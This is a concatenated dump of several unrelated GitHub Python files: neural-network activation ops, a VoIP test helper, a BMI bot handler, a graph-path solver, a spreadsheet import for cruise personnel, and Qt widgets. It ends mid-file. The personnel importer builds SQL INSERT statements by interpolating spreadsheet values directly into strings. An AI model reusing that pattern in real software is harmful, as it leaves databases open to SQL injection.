create_observation_set(S, As, M, observation_group_size)\n\n\tlikelihood_o_given_true = log_likelihood(observation_set, S, weight_fn_reciprocal)\n\tfinal_sgraph, final_value, sgraphs, values = create_synergy_graph(observation_set, agents, weight_fn_reciprocal, k_max, display=False)\n\tlikelihood_errors = list(map(lambda likelihood_o_given_learned: abs(likelihood_o_given_true - likelihood_o_given_learned), values))\n\n\t# Plot true graph, initial graph, learned graph, and log likelihood error\n\tgs = gridspec.GridSpec(2, 3)\n\tfig = plt.figure()\n\n\tax1 = fig.add_subplot(gs[0, 0], title=\"True Graph\") \n\tnx.draw(S.graph, ax=ax1, with_labels=True, font_weight='bold')\n\n\tax2 = fig.add_subplot(gs[0, 1], title=\"Initial Graph\") \n\tinitial_graph = sgraphs[0]\n\tnx.draw(initial_graph.graph, ax=ax2, with_labels=True, font_weight='bold')\n\n\tax3 = fig.add_subplot(gs[0, 2], title=\"Learned Graph\") \n\tnx.draw(final_sgraph.graph, ax=ax3, with_labels=True, font_weight='bold')\n\n\tax3 = fig.add_subplot(gs[1, :], title=\"Error of Learned Graph for every Accepted Annealing Step\", xlabel=\"Step\", ylabel=\"Log-Likelihood Error\") \n\tax3.plot(likelihood_errors)\n\tplt.show()\n","repo_name":"psandovalsegura/synergy-algorithms","sub_path":"tests/test_synergy.py","file_name":"test_synergy.py","file_ext":"py","file_size_in_byte":17166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"650774151","text":"from smaug.core import node_pb2, types_pb2\nfrom smaug.python import global_vars\nfrom smaug.python.ops import array_ops, common\n\ndef _set_activation_params(activation, params, proto):\n \"\"\"Set the parameters of the activation function.\n\n Args:\n activation: An activation op type such as `types_pb2.ReLU`.\n params: kwargs for the activation function parameters.\n proto: An `ActivationParams`, the proto to set.\n \"\"\"\n if params is not None:\n if activation == types_pb2.LReLU:\n proto.lrelu_params.slope = params[\"slope\"]\n elif activation == types_pb2.ELU:\n proto.elu_params.alpha = params[\"alpha\"]\n elif activation == types_pb2.SELU:\n proto.elu_params.alpha = params[\"alpha\"]\n proto.elu_params.lambda_param = params[\"lambda_param\"]\n elif activation == types_pb2.HardTanh:\n proto.hard_tanh_params.min = params[\"min\"]\n proto.hard_tanh_params.max = params[\"max\"]\n else:\n # Use default values for the parameters if not specified.\n if activation == types_pb2.LReLU:\n proto.lrelu_params.slope = 0.2\n elif activation == types_pb2.ELU:\n proto.elu_params.alpha = 0.1\n elif activation == types_pb2.SELU:\n proto.elu_params.alpha = 1.6733\n proto.elu_params.lambda_param = 1.0507\n elif activation == types_pb2.HardTanh:\n proto.hard_tanh_params.min = -1\n proto.hard_tanh_params.max = 1\n\ndef get_activation_op(activation):\n \"\"\"Return an activation function functor.\n\n Args:\n activation: A string representing the activation function.\n \"\"\"\n return _activation_type_op_tuples[activation][1]\n\ndef to_proto(activation, params):\n \"\"\"Return the activation proto.\n\n Args:\n activation: A string representing the activation function.\n params: kwargs for the activation function parameters.\n proto: An `ActivationParams`, the proto to set.\n\n Returns:\n An `ActivationParams`, the proto.\n \"\"\"\n proto = node_pb2.ActivationParams()\n act_type = _activation_type_op_tuples[activation][0]\n proto.activation = act_type\n _set_activation_params(act_type, params, proto)\n return proto\n\ndef relu(input_tensor, name=\"relu\"):\n \"\"\"Rectified linear unit operator.\"\"\"\n return common.add_node(\n name=name, op=types_pb2.ReLU, input_tensors=[input_tensor],\n output_tensors_dims=[input_tensor.shape.dims],\n output_tensor_layout=input_tensor.shape.layout)[0]\n\ndef lrelu(input_tensor, slope=0.2, name=\"lrelu\"):\n \"\"\"Leaky rectified linear unit operator: max(slope * x, 0).\"\"\"\n params = node_pb2.Params()\n params.act_params.lrelu_params.slope = slope\n return common.add_node(\n name=name, op=types_pb2.LReLU, input_tensors=[input_tensor],\n output_tensors_dims=[input_tensor.shape.dims],\n output_tensor_layout=input_tensor.shape.layout, params=params)[0]\n\ndef elu(input_tensor, alpha=0.1, name=\"relu\"):\n \"\"\"Exponential linear unit function.\n\n Defined as:\n if input_tensor > 0, alpha * exp(input_tensor - 1), else input_tensor.\n \"\"\"\n params = node_pb2.Params()\n params.act_params.elu_params.alpha = alpha\n return common.add_node(\n name=name, op=types_pb2.ELU, input_tensors=[input_tensor],\n output_tensors_dims=[input_tensor.shape.dims],\n output_tensor_layout=input_tensor.shape.layout, params=params)[0]\n\ndef selu(input_tensor, alpha=1.6733, lambda_param=1.0507, name=\"selu\"):\n \"\"\"Scaled exponential linear unit function.\n\n Defined as: lambda_param * elu(input_tensor, alpha).\n \"\"\"\n params = node_pb2.Params()\n params.act_params.elu_params.alpha = alpha\n params.act_params.elu_params.lambda_param = lambda_param\n return common.add_node(\n name=name, op=types_pb2.SELU, input_tensors=[input_tensor],\n output_tensors_dims=[input_tensor.shape.dims],\n output_tensor_layout=input_tensor.shape.layout, params=params)[0]\n\ndef tanh(input_tensor, name=\"tanh\"):\n \"\"\"Tanh operator.\"\"\"\n return common.add_node(\n name=name, op=types_pb2.Tanh, input_tensors=[input_tensor],\n output_tensors_dims=[input_tensor.shape.dims],\n output_tensor_layout=input_tensor.shape.layout)[0]\n\ndef hard_tanh(input_tensor, min=-1, max=1, name=\"hard_tanh\"):\n \"\"\"Hard tanh operator.\n\n This bounds the min and max values of the tanh operator.\n \"\"\"\n params = node_pb2.Params()\n params.act_params.hard_tanh_params.min = min\n params.act_params.hard_tanh_params.max = max\n return common.add_node(\n name=name, op=types_pb2.HardTanh, input_tensors=[input_tensor],\n output_tensors_dims=[input_tensor.shape.dims],\n output_tensor_layout=input_tensor.shape.layout, params=params)[0]\n\ndef sigmoid(input_tensor, name=\"sigmoid\"):\n \"\"\"Sigmoid operator.\n\n Defined as 1/(1 + exp(-input_tensor)).\n \"\"\"\n return common.add_node(\n name=name, op=types_pb2.Sigmoid, input_tensors=[input_tensor],\n output_tensors_dims=[input_tensor.shape.dims],\n output_tensor_layout=input_tensor.shape.layout)[0]\n\ndef softmax(input_tensor, name=None):\n \"\"\"Softmax operator.\"\"\"\n input_tensor = array_ops.check_and_add_layout_transform(\n name=name, op=types_pb2.Softmax, input_tensors=[input_tensor])[0]\n return common.add_node(\n name=name, op=types_pb2.Softmax, input_tensors=[input_tensor],\n output_tensors_dims=[input_tensor.shape.dims],\n output_tensor_layout=input_tensor.shape.layout)[0]\n\n_activation_type_op_tuples = {\n \"relu\": (types_pb2.ReLU, relu),\n \"lrelu\": (types_pb2.LReLU, lrelu),\n \"elu\": (types_pb2.ELU, elu),\n \"selu\": (types_pb2.SELU, selu),\n \"tanh\": (types_pb2.Tanh, tanh),\n \"hard_tanh\": (types_pb2.HardTanh, hard_tanh),\n \"sigmoid\": (types_pb2.Sigmoid, sigmoid),\n \"softmax\": (types_pb2.Softmax, softmax)\n}\n","repo_name":"harvard-acc/smaug","sub_path":"smaug/python/ops/activation_ops.py","file_name":"activation_ops.py","file_ext":"py","file_size_in_byte":5602,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"53"} +{"seq_id":"12407763578","text":"from __future__ import annotations\n\nimport logging\n\nfrom pathlib import Path\n\n\nfrom .dird import DirdMockClient\nfrom .agentd import AgentdMockClient\nfrom .agid import AgidClient\nfrom .confd import ConfdMockClient\nfrom .calld import CalldMockClient\nfrom .database import DbHelper\nfrom .filesystem import FileSystemClient\nfrom wazo_test_helpers.asset_launching_test_case import (\n AbstractAssetLaunchingHelper,\n cached_class_property,\n NoSuchPort,\n NoSuchService,\n WrongClient,\n)\nfrom wazo_test_helpers import until\n\nDEFAULT_LOG_FORMAT = '%(asctime)s [%(process)d] (%(levelname)s) (%(name)s): %(message)s'\nlogging.basicConfig(format=DEFAULT_LOG_FORMAT)\n\n\nclass BaseAssetLaunchingHelper(AbstractAssetLaunchingHelper):\n assets_root = Path(__file__).parent / '..' / '..' / 'assets'\n asset = 'base'\n service = 'agid'\n\n @classmethod\n def reset_clients(cls):\n for attr in ('agid', 'db', 'calld', 'confd', 'agentd', 'filesystem', 'dird'):\n delattr(cls, attr)\n until.true(cls.agid.is_ready, timeout=30)\n\n @classmethod\n def launch_service_with_asset(cls) -> None:\n \"\"\"Make sure Agid service is up before starting first test.\"\"\"\n super().launch_service_with_asset()\n until.true(cls.agid.is_ready, timeout=30)\n\n @cached_class_property\n def agid(cls) -> AgidClient:\n port = cls.service_port(4573, 'agid')\n return AgidClient('127.0.0.1', port)\n\n @cached_class_property\n def confd(cls) -> ConfdMockClient:\n port = cls.service_port('9486', 'confd')\n return ConfdMockClient('127.0.0.1', port, version='1.1')\n\n @cached_class_property\n def agentd(cls) -> AgentdMockClient:\n return AgentdMockClient('127.0.0.1', cls.service_port('9493', 'agentd'))\n\n @cached_class_property\n def calld(cls) -> CalldMockClient:\n return CalldMockClient('127.0.0.1', cls.service_port('9500', 'calld'))\n\n @cached_class_property\n def dird(cls) -> DirdMockClient:\n return DirdMockClient(\n '127.0.0.1', cls.service_port('9489', 'dird'), version='0.1'\n )\n\n @cached_class_property\n def db(cls) -> DbHelper | WrongClient:\n try:\n port = cls.service_port(5432, 'postgres')\n except (NoSuchService, NoSuchPort):\n return WrongClient('postgres')\n\n # NOTE(fblackburn): Avoid importing wazo_agid and dependencies in tests,\n # since no database tests are needed\n return DbHelper.build(\n user='asterisk',\n password='proformatique',\n host='127.0.0.1',\n port=port,\n db='asterisk',\n )\n\n @cached_class_property\n def filesystem(cls) -> FileSystemClient:\n return FileSystemClient(execute=cls.docker_exec, service_name=cls.service)\n","repo_name":"wazo-platform/wazo-agid","sub_path":"integration_tests/suite/helpers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16147969102","text":"import csv\n\n\nclass Laptop:\n def __init__(self, manufacturer, model, category, screen_size, screen, cpu, ram, storage, gpu, op_system, op_sys_ver, weight, price):\n self.brand = manufacturer\n self.model = model\n self.category = category\n self.screen_size = screen_size\n self.screen = screen\n self.cpu = cpu\n self.ram = ram\n self.storage = storage\n self.gpu = gpu\n self.op_system = op_system\n self.op_sys_ver = op_sys_ver\n self.weight = weight\n self.price = price\n\n\ndef get_laptops():\n laps = []\n with open(\"/home/davo/Desktop/laptops.csv\") as f:\n reader = csv.reader(f)\n for i, row in enumerate(reader):\n if i == 0:\n continue\n laps.append(Laptop(\n row[0],\n row[1],\n row[2],\n float(row[3].strip('\"')),\n row[4],\n row[5],\n int(row[6].rstrip(\"GB\")),\n row[7],\n row[8],\n row[9],\n row[10],\n float(row[11].replace(\",\", \".\").rstrip(\"kgs\")),\n float(row[12].replace(\",\", \".\"))\n ))\n return laps\n\n\ndef highest_price(laps, count):\n laps.sort(key=lambda x: x.price)\n return laps[-count-1:-1]\n\n\ndef heaviest(laps, count):\n laps.sort(key=lambda x: x.weight)\n return laps[-count-1:-1]\n\n\ndef cheapest(laps, count):\n laps.sort(key=lambda x: x.price)\n return laps[0:count]\n\n\ndef brand_count(laps):\n diction = {}\n for i in laps:\n diction[i.brand] = diction.get(i.brand, 0) + 1\n return diction\n\n\ndef op_count(laps):\n diction = {}\n for i in laps:\n diction[i.op_system] = diction.get(i.op_system, 0) + 1\n return diction\n\n\ndef ram_count(laps):\n diction = {}\n for i in laps:\n diction[f\"{i.ram}GB\"] = diction.get(i.ram, 0) + 1\n return diction\n\n\ndef powerful_ram(laps, count):\n laps.sort(key=lambda x: x.ram)\n return laps[-count-1:-1]\n\n\nobj_list = get_laptops()\n\nfor i in highest_price(obj_list, 5):\n print(f\"{i.brand} : {i.model} : {i.price}\")\n\n\nfor i in cheapest(obj_list, 5):\n print(f\"{i.brand} : {i.model} : {i.price}\")\n\n\nfor i in heaviest(obj_list, 5):\n print(f\"{i.brand} : {i.model} : {i.weight}\")\n\n\nfor i in powerful_ram(obj_list, 5):\n print(f\" {i.brand} : {i.model} : {i.ram}GB\")\n\n\nprint(ram_count(obj_list))\n\nprint(brand_count(obj_list))\n\nprint(op_count(obj_list))\n\n\n","repo_name":"Davitkhachikyan/HTI-1-Practical-Group-2-Davit-Khachikyan","sub_path":"homework_9/laptops.py","file_name":"laptops.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40387871094","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QLabel\nimport os\n\nclass PrincipalIcon(QLabel):\n def __init__(self, PrincipalGrid):\n QLabel.__init__(self, PrincipalGrid)\n self.setMinimumSize(QtCore.QSize(300, 100))\n self.setMaximumSize(QtCore.QSize(300, 100))\n self.setStyleSheet(\"background-color: rgb(255,255,255);\")\n self.setText(\"\")\n self.setPixmap(QtGui.QPixmap(os.path.join(os.path.dirname(os.path.abspath(__file__)),'icon.png')))\n self.setScaledContents(False)\n self.setIndent(0)\n self.setObjectName(\"label\")\n","repo_name":"gabgarar/SunMap","sub_path":"CrossEditorProject/View/QtViews/LeftPrincipalPanel/PrincipalIcon.py","file_name":"PrincipalIcon.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"20523063112","text":"from NekoGram import NekoRouter, Neko, Menu\nfrom aiogram import types\nfrom math import pow\n\nROUTER = NekoRouter()\n\n\n@ROUTER.function(name='menu_calculate_bmi_step_2')\nasync def _(_: Menu, message: types.Message, neko: Neko):\n user_data = await neko.storage.get_user_data(user_id=message.from_user.id)\n weight = int(user_data['menu_calculate_bmi']['text'])\n height = int(user_data['menu_calculate_bmi_step_2']['text'])\n\n \"\"\"\n With the metric system, the formula for BMI is weight in kilograms divided by height in meters squared. \n Since height is commonly measured in centimeters, an alternate calculation formula, dividing the weight \n in kilograms by the height in centimeters squared, and then multiplying the result by 10,000, can be used.\n \"\"\"\n bmi = (weight / pow(height, 2)) * 10000\n\n data = await neko.build_menu(name='bmi_result', obj=message)\n await data.build(text_format={'bmi': bmi})\n await neko.storage.set_user_data(user_id=message.from_user.id)\n await data.send_message()\n","repo_name":"lyteloli/NekoGramBMICalculator","sub_path":"menus/bmi/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4316453286","text":"def name_to_number(name):\n if name == \"rock\":\n number = 0\n elif name == \"Spock\":\n number = 1\n elif name == \"paper\":\n number = 2\n elif name == \"lizard\":\n number = 3\n elif name == \"scissors\":\n number = 4\n else:\n print ( \"You aren't playing this game!\" )\n return number\n","repo_name":"arasharn/Interactive-Programming-with-Python","sub_path":"Rock- Paper- Scissors- Lizard- Spock/name_to_number.py","file_name":"name_to_number.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35024519617","text":"import pandas as pd\nfrom website import DB\nfrom website.lib.get_data import get_data, get_cruise\nimport psycopg2\nimport uuid\n\ndef check_content(df, header_row):\n\n cruise_details_df = get_cruise(DB)\n CRUISE_NUMBER = str(cruise_details_df['cruise_number'].item())\n\n missing_first_names = []\n missing_last_names = []\n missing_emails = []\n invalid_emails = []\n already_registered_personnel = []\n missing_institutions = []\n invalid_institutions = []\n invalid_new_institutions = []\n new_institution_already_registered = []\n invalid_orcids = []\n institutionsToRegister = []\n\n registered_personnel_df = get_data(DB, 'personnel_'+str(CRUISE_NUMBER))\n registered_emails = list(registered_personnel_df['email'])\n registered_institutions = list(registered_personnel_df['email'])\n\n institutions_df = get_data(DB, 'institutions')\n registered_institutions = list(institutions_df['full_name'])\n\n for idx, row in df.iterrows():\n\n row_num = idx + header_row + 2\n\n firstName = row['firstName']\n lastName = row['lastName']\n email = row['email']\n orcID = row['orcID']\n institution = row['institution']\n institutionToRegister = row['institutionToRegister']\n\n # Validations for first name\n if type(firstName) != str:\n missing_first_names.append(row_num)\n\n # Validations for last name\n if type(lastName) != str:\n missing_last_names.append(row_num)\n\n # Validations for email\n if type(email) != str:\n missing_emails.append(row_num)\n elif '@' not in email:\n invalid_emails.append(row_num)\n elif email in registered_emails:\n already_registered_personnel.append(row_num)\n\n # Validations for OrcID\n if type(orcID) == str:\n if len(orcID) != 37:\n invalid_orcids.append(row_num)\n elif orcID.startswith('https://orcid.org/') == False:\n invalid_orcids.append(row_num)\n else:\n df['orcID'][idx] = 'NULL'\n\n # Validations for institution\n if type(institution) != str or institution == 'Other':\n if type(institutionToRegister) != str:\n missing_institutions.append(row_num)\n elif institutionToRegister in registered_institutions:\n df['institution'][idx] = institutionToRegister\n elif len(institutionToRegister) < 7:\n invalid_new_institutions.append(row_num)\n else:\n institutionsToRegister.append(institutionToRegister)\n df['institution'][idx] = institutionToRegister\n\n elif institution not in registered_institutions:\n invalid_institutions.append(row_num)\n\n duplicates = df[df.duplicated('email', keep=False)]\n duplicate_groups = duplicates.groupby('email').groups\n duplicate_emails = [duplicates.loc[group].index.tolist() for group in duplicate_groups.values()]\n\n content_errors = []\n\n if len(missing_first_names) > 0:\n content_errors.append(\n f'Missing first name for row(s): {missing_first_names}'\n )\n if len(missing_last_names) > 0:\n content_errors.append(\n f'Missing last name for row(s): {missing_last_names}'\n )\n if len(missing_emails) > 0:\n content_errors.append(\n f'Missing email for row(s): {missing_emails}'\n )\n if len(invalid_emails) > 0:\n content_errors.append(\n f'Email must include an @ symbol, row(s): {invalid_emails}'\n )\n if len(already_registered_personnel) > 0:\n content_errors.append(\n f'Person with same email already registered, row(s): {already_registered_personnel}'\n )\n if len(invalid_orcids) > 0:\n content_errors.append(\n f'OrcID should be 37 characers long and begin with https://orcid.org/, row(s): {invalid_orcids}'\n )\n if len(missing_institutions) > 0:\n content_errors.append(\n f'Missing institution, row(s): {missing_institutions}'\n )\n if len(invalid_institutions) > 0:\n content_errors.append(\n f'Institution not registered and should not be listed in institution column, row(s): {invalid_institutions}'\n )\n if len(invalid_new_institutions) > 0:\n content_errors.append(\n f'Institution to register should be at least 7 characters long. Please use the full name. Row(s): {invalid_new_institutions}'\n )\n if len(duplicate_emails) > 0:\n content_errors.append(\n f'Same email address listed more than once in the file. Row(s): {duplicate_emails}'\n )\n\n institutionsToRegister = list(set(institutionsToRegister))\n\n return content_errors, institutionsToRegister, df\n\ndef register_personnel_from_file(f):\n\n cruise_details_df = get_cruise(DB)\n CRUISE_NUMBER = str(cruise_details_df['cruise_number'].item())\n\n good = True\n errors = []\n\n if f.filename == '':\n good = False\n errors.append('No file selected')\n return good, errors\n\n else:\n\n filepath = '/tmp/'+f.filename\n f.save(filepath)\n\n header_row = 5 # Hidden row on row 10\n\n if filepath.endswith(\".xlsx\"):\n try:\n df = pd.read_excel(filepath, sheet_name = 'Personnel', header=header_row)\n except:\n errors.append(\"Data couldn't be read from the Personnel sheet. Did you upload the correct file? The column headers should be on hidden row 6.\")\n good = False\n return good, errors\n\n content_errors, institutionsToRegister, df = check_content(df, header_row)\n\n errors = errors + content_errors\n if len(errors) > 0:\n good = False\n return good, errors\n\n else:\n conn = psycopg2.connect(**DB)\n cur = conn.cursor()\n for institution in institutionsToRegister:\n cur.execute(f\"INSERT INTO institutions (id, full_name, created) VALUES ('{uuid.uuid4()}', '{institution}', CURRENT_TIMESTAMP);\")\n\n for idx, row in df.iterrows():\n first_name = row['firstName']\n last_name = row['lastName']\n email = row['email']\n personnel = f\"{first_name} {last_name} ({email})\"\n orcid = row['orcID']\n institution = row['institution']\n if type(orcid) == str and orcid != 'NULL':\n cur.execute(f\"INSERT INTO personnel_{CRUISE_NUMBER} (id, personnel, first_name, last_name, institution, email, orcid, created) VALUES ('{uuid.uuid4()}', '{personnel}', '{first_name}','{last_name}','{institution}','{email}','{orcid}', CURRENT_TIMESTAMP);\")\n else:\n cur.execute(f\"INSERT INTO personnel_{CRUISE_NUMBER} (id, personnel, first_name, last_name, institution, email, created) VALUES ('{uuid.uuid4()}', '{personnel}', '{first_name}','{last_name}','{institution}','{email}', CURRENT_TIMESTAMP);\")\n conn.commit()\n cur.close()\n conn.close()\n\n else:\n errors.append('File must be an \"XLSX\" file.')\n good = False\n\n return good, errors\n","repo_name":"SIOS-Svalbard/Learnings_from_AeN_logging_system","sub_path":"website/lib/register_personnel_from_file.py","file_name":"register_personnel_from_file.py","file_ext":"py","file_size_in_byte":7339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16725740817","text":"import sys\r\nimport heapq\r\n\r\ninput = sys.stdin.readline\r\n\r\ndef djikstra(start):\r\n global graph\r\n distances = [0xffffff for _ in range(len(graph))]\r\n distances[start] = 0\r\n Q = []\r\n heapq.heappush(Q, (distances[start], start))\r\n\r\n while Q:\r\n\r\n current_distance, current_destination = heapq.heappop(Q)\r\n if distances[current_destination] < current_distance:\r\n continue\r\n\r\n for new_destination, new_distance in graph[current_destination]:\r\n distance = current_distance + new_distance\r\n if distance < distances[new_destination]:\r\n distances[new_destination] = distance\r\n heapq.heappush(Q, (distance, new_destination))\r\n\r\n return distances\r\n\r\n\r\n\r\n\r\nN, E = map(int, input().split())\r\ngraph = [[] for _ in range(N)]\r\nfor _ in range(E):\r\n a, b, w = map(int, input().split())\r\n graph[a - 1].append((b - 1, w))\r\n graph[b - 1].append((a - 1, w))\r\nv1, v2 = map(int, input().split())\r\n\r\nbasic_distance = djikstra(0)\r\nv1_distance = djikstra(v1 - 1)\r\nv2_distance = djikstra(v2 - 1)\r\nans = min(basic_distance[v1 - 1] + v1_distance[v2 - 1] + v2_distance[N - 1], basic_distance[v2 - 1] + v2_distance[v1 - 1] + v1_distance[N - 1])\r\nif ans >= 0xffffff:\r\n ans = -1\r\nprint(ans)\r\n","repo_name":"bshello/Algo","sub_path":"백준/Gold/1504. 특정한 최단 경로/특정한 최단 경로.py","file_name":"특정한 최단 경로.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6166933985","text":"from genericpath import isfile\nimport os\nimport config\nimport shortcut as sc\nif config.qtLibrary == \"pyside6\":\n from PySide6.QtGui import QKeySequence, QAction, QShortcut\n from PySide6.QtWidgets import QFileDialog, QInputDialog, QLineEdit\n from PySide6.QtCore import Qt, QUrl\n from PySide6.QtWidgets import QMenu\n from PySide6.QtWebEngineCore import QWebEnginePage\n from PySide6.QtWebEngineWidgets import QWebEngineView\nelse:\n from qtpy.QtGui import QKeySequence\n from qtpy.QtWidgets import QFileDialog, QInputDialog, QLineEdit, QShortcut\n from qtpy.QtCore import Qt, QUrl\n from qtpy.QtWidgets import QAction, QMenu\n from qtpy.QtWebEngineWidgets import QWebEngineView, QWebEnginePage\n\n\nclass WebEngineViewPopover(QWebEngineView):\n\n def __init__(self, parent, name, source, windowTitle=\"\", enableCloseAction=True):\n super().__init__()\n self.parent = parent\n self.name = name\n self.enableCloseAction = enableCloseAction\n self.wsName = \"reader\"\n self.wsFilename = \"\"\n self.source = source\n self.html = None\n self.setWindowTitle(windowTitle if windowTitle else \"Unique Bible App\")\n self.titleChanged.connect(self.popoverTextCommandChanged)\n self.page().loadFinished.connect(self.finishViewLoading)\n # add context menu (triggered by right-clicking)\n self.setContextMenuPolicy(Qt.ActionsContextMenu)\n self.addMenuActions()\n self.setupKeyboardShortcuts()\n\n def setupKeyboardShortcuts(self):\n if hasattr(self.parent, \"name\") and self.parent.name == \"workspace\":\n shortcut = QShortcut(QKeySequence(sc.swapWorkspaceWithMainWindow), self)\n shortcut.activated.connect(self.parent.parent.swapWorkspaceWithMainWindow)\n\n def finishViewLoading(self):\n activeVerseNoColour = config.darkThemeActiveVerseColor if config.theme == \"dark\" else config.lightThemeActiveVerseColor\n # scroll to the study verse\n self.page().runJavaScript(\"var activeVerse = document.getElementById('v\"+str(config.studyB)+\".\"+str(config.studyC)+\".\"+str(config.studyV)+\"'); if (typeof(activeVerse) != 'undefined' && activeVerse != null) { activeVerse.scrollIntoView(); activeVerse.style.color = '\"+activeVerseNoColour+\"'; } else if (document.getElementById('v0.0.0') != null) { document.getElementById('v0.0.0').scrollIntoView(); }\")\n if not self.htmlStored:\n self.page().toHtml(self.getHtml)\n \n def load(self, url):\n try:\n filepath = url.toLocalFile()\n if os.path.isfile(filepath):\n with open(filepath, 'r', encoding='utf8') as fileObj:\n self.html = fileObj.read()\n self.htmlStored = True\n else:\n self.htmlStored = False\n except:\n self.htmlStored = False\n super().load(url)\n\n def setHtml(self, html, baseUrl=QUrl()):\n if config.bibleWindowContentTransformers:\n for transformer in config.bibleWindowContentTransformers:\n html = transformer(html)\n self.html = html\n self.htmlStored = True\n super().setHtml(html, baseUrl)\n\n def getHtml(self, html):\n # store html in a variable when page is finished loading to facilitate file saving\n self.html = html\n self.htmlStored = True\n\n def popoverTextCommandChanged(self, newTextCommand):\n # reset document.title\n changeTitle = \"document.title = 'UniqueBible.app';\"\n self.page().runJavaScript(changeTitle)\n # run textCommandChanged from parent\n if not newTextCommand == \"ePubViewer.html\" and not newTextCommand.endswith(\".pdf\") and not newTextCommand.startswith(\"viewer.html\"):\n #print(newTextCommand, self.source)\n config.mainWindow.textCommandChanged(newTextCommand, self.source)\n\n def addToWorkspaceReadOnly(self):\n if self.htmlStored:\n self.addToWorkspaceReadOnlyAction(self.html)\n else:\n self.page().toHtml(self.addToWorkspaceReadOnlyAction)\n\n def addToWorkspaceEditable(self):\n if self.htmlStored:\n self.addToWorkspaceEditableAction(self.html)\n else:\n self.page().toHtml(self.addToWorkspaceEditableAction)\n\n def addToWorkspaceReadOnlyAction(self, html):\n windowTitle = self.windowTitle() if not self.windowTitle() == \"Unique Bible App\" else \"\"\n config.mainWindow.addToWorkspaceReadOnlyAction(html, windowTitle)\n\n def addToWorkspaceEditableAction(self, html):\n windowTitle = self.windowTitle() if not self.windowTitle() == \"Unique Bible App\" else \"\"\n config.mainWindow.addToWorkspaceEditableAction(html, windowTitle)\n\n def addMenuActions(self):\n\n if hasattr(self.parent, \"name\") and self.parent.name == \"workspace\":\n action = QAction(self)\n action.setText(config.thisTranslation[\"changeWindowTitle\"])\n action.triggered.connect(self.changeWindowTitle)\n self.addAction(action)\n\n action = QAction(self)\n action.setText(config.thisTranslation[\"openInEditor\"])\n action.triggered.connect(self.openInEditor)\n self.addAction(action)\n else:\n subMenu1 = QMenu()\n action = QAction(self)\n action.setText(config.thisTranslation[\"readOnly\"])\n action.triggered.connect(self.addToWorkspaceReadOnly)\n subMenu1.addAction(action)\n action = QAction(self)\n action.setText(config.thisTranslation[\"editable\"])\n action.triggered.connect(self.addToWorkspaceEditable)\n subMenu1.addAction(action)\n\n subMenu2 = QMenu()\n action = QAction(self)\n action.setText(config.thisTranslation[\"readOnly\"])\n action.triggered.connect(self.addTextSelectionToWorkspace)\n subMenu2.addAction(action)\n action = QAction(self)\n action.setText(config.thisTranslation[\"editable\"])\n action.triggered.connect(lambda: self.addTextSelectionToWorkspace(editable=True))\n subMenu2.addAction(action)\n\n subMenu3 = QMenu()\n action = QAction(self)\n action.setText(config.thisTranslation[\"readOnly\"])\n action.triggered.connect(self.addBibleReferencesInTextSelectionToWorkspace)\n subMenu3.addAction(action)\n action = QAction(self)\n action.setText(config.thisTranslation[\"editable\"])\n action.triggered.connect(lambda: self.addBibleReferencesInTextSelectionToWorkspace(editable=True))\n subMenu3.addAction(action)\n\n subMenu = QMenu()\n action = QAction(self)\n action.setText(config.thisTranslation[\"all\"])\n action.setMenu(subMenu1)\n subMenu.addAction(action)\n action = QAction(self)\n action.setText(config.thisTranslation[\"textOnly\"])\n action.setMenu(subMenu2)\n subMenu.addAction(action)\n action = QAction(self)\n action.setText(config.thisTranslation[\"bibleReferencesInTextSelection\"])\n action.setMenu(subMenu3)\n subMenu.addAction(action)\n\n action = QAction(self)\n action.setText(config.thisTranslation[\"addToWorkSpace\"])\n action.setMenu(subMenu)\n self.addAction(action)\n\n separator = QAction(self)\n separator.setSeparator(True)\n self.addAction(separator)\n\n copyText = QAction(self)\n copyText.setText(config.thisTranslation[\"context1_copy\"])\n copyText.triggered.connect(self.copySelectedText)\n self.addAction(copyText)\n\n action = QAction(self)\n action.setText(config.thisTranslation[\"saveHtml\"])\n action.triggered.connect(self.saveHtml)\n self.addAction(action)\n\n separator = QAction(self)\n separator.setSeparator(True)\n self.addAction(separator)\n\n subMenu = QMenu()\n\n if not self.name == \"popover\":\n action = QAction(self)\n action.setText(\"{0} | {1}\".format(config.thisTranslation[\"openOnNewWindow\"], sc.displayReferenceOnNewWindowPopover))\n action.setShortcut(QKeySequence(sc.displayReferenceOnNewWindowPopover))\n action.triggered.connect(self.displayVersesInNewWindow)\n subMenu.addAction(action)\n\n action = QAction(self)\n action.setText(\"{0} | {1}\".format(config.thisTranslation[\"bar1_menu\"], sc.displayReferenceOnBibleWindowPopover))\n action.setShortcut(QKeySequence(sc.displayReferenceOnBibleWindowPopover))\n action.triggered.connect(self.displayVersesInBibleWindow)\n subMenu.addAction(action)\n\n action = QAction(self)\n action.setText(config.thisTranslation[\"bottomWindow\"])\n action.triggered.connect(self.displayVersesInBottomWindow)\n subMenu.addAction(action)\n\n action = QAction(self)\n action.setText(\"{0} | {1}\".format(config.thisTranslation[\"presentation\"], sc.presentPopover))\n action.setShortcut(QKeySequence(sc.presentPopover))\n action.triggered.connect(self.displayVersesInPresentation)\n subMenu.addAction(action)\n\n action = QAction(self)\n action.setText(config.thisTranslation[\"displayVerses\"])\n action.setMenu(subMenu)\n self.addAction(action)\n\n if hasattr(config, \"macroIsRunning\") and config.macroIsRunning:\n spaceBar = QAction(self)\n spaceBar.setShortcut(QKeySequence(\" \"))\n 